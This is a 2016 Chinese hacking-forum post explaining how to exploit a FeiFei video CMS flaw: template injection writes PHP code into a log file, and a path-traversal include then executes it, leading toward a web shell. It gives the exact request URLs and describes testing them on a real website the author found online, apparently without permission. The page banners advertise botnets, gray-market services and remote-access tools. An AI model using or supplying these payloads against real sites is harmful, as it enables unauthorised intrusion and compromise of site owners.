墨客安全网»论坛首页 › 墨客安全网☆资源共享区 › 入侵渗透 › 飞飞影视漏洞之远程包含写shell

[悬赏公告] - 严查灌水，打造一个无水论坛，从即日起.请大家互相监督，发现恶意灌水的，请发贴举报，核实后会给予5-10的墨币奖励。	[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核，如有违反永久禁言处理！	[招聘招聘]-招聘各方面给力版主，要求每日发帖不少于3贴，每天在线时间6个小时以上，具体福利和待遇联系TG客服或者在线管理员	[官方公告]1.发现网盘下载地址失效！可以发贴举报审核证实后给予奖励10-20墨币。2.即日起！不管是谁发贴！都不能带QQ群已及个人QQ。个人网站,发现后严格处理。	[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利！
【官方公告】论坛所有广告均为商业行为，需要交易的请尽量走担保程序，所有因广告产生的任何纠纷请私下解决	【站外广告】大量收色刷！刷单肉鸡！带飞机肉鸡！寻内网横向技术！懂的来，小白勿扰！长期包养色刷，刷单，带飞机海外盘国内盘灰产肉鸡稳定鸡商联系飞机：@seeok91	【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服

查看: 363|回复: 0

[入侵技术文章] 飞飞影视漏洞之远程包含写shell

[复制链接]

成成{Jone}

该用户从未签到

13 主题	260 回帖	2667 积分

UID: 7360
威望: 382 (点)
主题: 13 (帖)
精华: 0 (帖)
贡献: 0 (次)
墨币: 1630 (枚)
活跃: 164 (点)
担保币: 0 (枚)
注册时间: 2016-5-16
最后登录: 2017-12-5

发表于 2016-7-10 16:29:23 | 显示全部楼层 |阅读模式

0x02

然后我上去乌云搜索了一下这个程序的漏洞，就找到了这么一个漏洞。

http://www.wooyun.org/bugs/wooyun-2014-082291

这里是他说了漏洞的形成怎么怎么滴。反正我是觉得好高大上。（原谅我还是一个菜逼）

其他我也不多说了。我今天就来说下，这个漏洞是怎么利用的。毕竟我php学的也不好。也不好给大家分析这个漏洞...

以下是我本地搭建的环境演示的。

首先我们先执行这个语句

index.php?s=my-show-id-1｛~phpinfo()}.html 这个语句。

如果报错了。显示这样
那就是证明漏洞应该是存在的。

执行完了之后我们看下生成了什么文件。
生成了下图这么一个文件。

QQ截图20160710162453.png

index.php?s=my-show-id-\..\runtime\logs\15_06_29.log.html
就可以了。这里生成的文件名  是年月日.log.html（年月日就是你当前的日期）

还有就是 include 包含的文件  无论是什么格式都以php执行。

接着我在网上找了一个网站测试了一下

先执行了

index.php?s=my-show-id-1｛~phpinfo()}.html

报错了..

QQ截图20160710162547.png

好的。我们接着执行

index.php?s=my-show-id-\..\runtime\logs\15_12_15.log.html 看看我们有没有写进去。

返回如下

QQ截图20160710162846.png

Ok. 我们成功写进去了。返回了phpinfo的信息。

（该漏洞在3.0的都还有漏洞。最新版5.0的修复了。）

至此文章结束。

新人必看帖，如何快速赚取墨币，了解墨客安全网论坛版规，等等...（ 点我查看）；

如果你在论坛悬赏问答求助问题，并且已经从坛友或者管理的回复中解决了问题，请在帖子内点击（已解决）；

发帖求助前要善用 论坛搜索 功能，如果搜不到可以试试，论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案；

如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报，核实给予退回墨币+额外的墨币奖励哦；

【新人必看贴】教你怎么快速赚墨币和了解墨客版规等- - - - - - - - - - - - -【请狂点这里】

使用道具举报